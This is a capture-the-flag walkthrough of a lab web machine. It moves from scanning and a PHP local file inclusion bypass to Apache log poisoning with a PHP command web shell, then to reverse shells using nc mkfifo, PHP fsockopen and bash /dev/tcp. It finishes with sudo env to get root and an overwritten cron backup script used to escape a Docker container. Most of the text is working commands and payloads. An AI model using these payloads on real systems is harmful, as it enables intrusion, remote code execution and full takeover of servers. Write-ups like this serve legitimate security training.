[Enumeration]
Port scan
nmap -Pn <ip>There’re 2 ports: 22 and 80.
OS and service scan
nmap -A -p 22,80 <ip>
Vulnerable scan
nmap --script vuln -p 22,80 <ip>
Access HTTP Site
View page source
Click cat
Click dog
Scan site’s directory.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,htmlThere’re 3 interesting files: flag.php, cat.php, and dog.php.
Access all of them.
dog.php
cat.php
flag.php , nothing revealed.
[Explaoitation]
Back to the site, seems like index page is included with “dog.php” and “cat.php”.
Try to view “flag”. Failed!!!
Only dogs and cats are allowed.
Try to access “/etc/passwd”. Failed!!!
Try to access “./dog”
Seems like I can call anything, but I need text “dog” in the request.
Let’s append “/etc/passwd” in the request.
http://<ip>/?view=./dog/../../../../../../../../../../../../../etc/passwdSeems like I need to bypass it.
Using payload all the things
Reference: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
I will use php://filter with base64.
Let’s intercept with Burp Suite
Send to Repeater
Let’s view index page first.
http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../indexSuccess!!! There’s result with base64 strings.
Decode with Burp Suite’s Decoder.
Now I have source code of index.php.
Viewing the source code.
This means I have to include “dog” or “cat” in the request and If I don’t include parameter “ext”, It will automatically assign “.php”.
Let’s send the request again. This time I will try to read “/etc/passwd ” and include parameter “ext”
http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=Success!!!
View page source, not much useful.
Next step, I’ll use log poisoning exploitation.
Since I screw up log file. I have to terminate the machine and start again.
I will use Burp Suite repeater to send the request
http://<ip>/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=Success!!! Now I can access /var/log/apache2/access.log
Let’s add command
Edit User-Agent to be:
<?php system($_GET['cmd']); ?>Send the request as:
/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=idSuccess!!!
Let’s get the reverse shell.
Create listener
nc -lvp 1234
Reverse shell reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Use Burp Suite to encode command as URL
I tried this command first:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Copy to the request and send. Failed!!!
Since this site is php, This time I will use php command.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Copy to the request and send.
Back to listener, Now I have a shell.
[Privilege escalation]
Let’s explore the machine.
pwdlscat flag.php
Now I have first flag.
cd ..ls
There’s flag2 in “/var/www”.
cat flag2_QMW7JvaY2LvK.txt
Let’s explore user directory
cd /homelsls -la
Nothing
Let’s verify if I can use sudo command.
I can use “env”.
Root command reference: https://gtfobins.github.io/gtfobins/env/#sudo
sudo env /bin/shid
Now I’m root.
cd /rootlscat flag3.txt
Now I have flag3.
Let’s explore the machine furthermore to find last flag.
cd /tmpls
Nothing
cd /optls -la
There’s backups directory
cd backupsls -la
This “backup.sh” s interesting.
cat backup.shThis machine have a docker.
Let’s bypass it
Create another reverse shell
nc -lvp 1235
Replace former script in backup.sh with reverse shell
echo "#!/bin/bash" > backup.shecho "/bin/bash -c 'bash -i >& /dev/tcp/<ip>/1235 0>&1'" >> backup.sh
Back to listener and wait for awhile.
Now I have another shell.
lsThere’s forth flag.
cat flag4.txt
